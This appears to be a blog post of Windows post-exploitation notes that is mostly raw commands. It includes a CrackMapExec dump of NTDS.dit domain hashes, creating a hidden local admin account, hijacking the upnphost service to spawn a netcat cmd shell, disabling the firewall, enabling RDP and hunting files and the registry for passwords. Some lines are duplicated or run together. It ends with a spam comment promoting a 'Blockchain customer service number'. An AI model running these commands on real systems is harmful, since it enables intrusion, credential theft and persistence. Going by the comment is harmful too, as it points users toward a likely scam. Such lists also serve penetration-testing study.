What to do when you have either a standard user or SYSTEM user in Windows. This is to help in either priv escalation if needed but more so to gather and enumerate as much information about the machine as possible!!
--==Scripts==--
windows-privesc-check2.exe --audit -a -o report.txt
systeminfo - Check for hotfixes installed?
NTDS.dit dump using Crackmapexec
cme smb 192.168.1.1 -u USERNAME -p 'PASSWORD' -d 'DOMAIN' --ntds --exec-method smbexec
Disable/Enable Firewall - Win XP/2003
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode mode=ENABLE
Check the firewall logs if exist?
C:\WINDOWS\pfirewall.log
View all listening service
netstat -an |find /i "listening"
--==Scripts==--
windows-privesc-check2.exe --audit -a -o report.txt
net user sp00ks sp00ks /add
net localgroup administrators sp00ks /add
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo - Check for hotfixes installed?
NTDS.dit dump using Crackmapexec
cme smb 192.168.1.1 -u USERNAME -p 'PASSWORD' -d 'DOMAIN' --ntds --exec-method smbexec
findstr /s /n /i /p /c:"password" *.txtatnetsh firewall show state
schtasks /query /fo LIST /v
tasklist /SVC
DRIVERQUERY
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
accesschk.exe -ucqv Spooler
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
type %WINDIR%\System32\drivers\etc\hostsnet usernet groupsnet accounts /domaincd C:\ & dir /S "proof.txt"
cd C:\ & dir /S "network-secret.txt"
netstat -pantob TCP
netstat -pantob UDP
start cmd.exe /k notepad.exe
Enable RDPreg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Disable/Enable Firewall - Win XP/2003
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode mode=ENABLE
Check the firewall logs if exist?
C:\WINDOWS\pfirewall.log
View all listening service
netstat -an |find /i "listening"
OS Name?
OS Version?
System Type?
Domain?
NICs?
Hotfixes?
Schedulted Tasks? (run 'at')
Password Policy? (net accounts /domain)
Hosts file output? (type %WINDIR%\System32\drivers\etc\hosts)
Firewall rules? (netsh advfirewall firewall)
Sometimes when users get into an error, they try to implement solutions and get into more deep trouble. The same case happens with Blockchain users when while trying to handle Blockchain two-factor authentication, they get into more trouble. Two-factor authentication is a delicate issue and needs to be resolved under the surveillance of professionals if you are a first-time user. Just dial Blockchain customer service number and get required and result-driven solutions immediately so that all your issues can easily be resolved and you can focus on trading.
ReplyDelete